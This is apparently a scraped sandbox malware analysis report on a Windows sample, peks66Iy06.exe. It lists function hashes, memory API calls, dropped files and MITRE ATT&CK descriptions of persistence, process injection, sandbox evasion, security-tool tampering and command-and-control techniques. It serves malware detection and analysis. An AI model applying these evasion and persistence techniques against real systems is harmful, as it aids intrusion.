String ID:
API String ID: 475730466-0
Opcode ID: 74a0a33ca5c9cfc2f231fa8d56fa11b01f59c705ee89c98f7395991253ccdf2e
Instruction ID: 8a47316f605976b62342ead09f9e2ff78638c0d05c570057b729d602be0c9d28
Opcode Fuzzy Hash: 74a0a33ca5c9cfc2f231fa8d56fa11b01f59c705ee89c98f7395991253ccdf2e
Instruction Fuzzy Hash: 2B01F432504226ABD7119B60CC45BDB3FB8EF023A1F204130F804DA290E730D5A1C6A5

Analysis Process: rundll32.exePID: 7880, Parent PID: 4056COMMON

Executed Functions

Function 04CF05A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04CF0625
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04CF0658

Memory Dump Source

Source File: 0000000F.00000003.1456059163.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_4cf0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
Instruction ID: 54882aa8278bc2aa4ad26695079ad5636e0a730e6d1c7d92bfbed9931abd6983
Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
Instruction Fuzzy Hash: 7B213035A00619BFDB008F65CC40BEEFBF6FB55794F50C162FE10A2281E77466519B54

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report peks66Iy06.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\1.txt

C:\ijbbn\gduol.dll

C:\nfxboms.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
peks66Iy06.exe

Function 00401220 Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 136
sleepfileprocessCOMMON

Function 00401140 Relevance: 4.6, APIs: 3, Instructions: 71
fileCOMMON

Function 00404578 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Function 004013D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 216
COMMON

Function 00403B10 Relevance: 45.6, APIs: 25, Strings: 1, Instructions: 149
fileCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre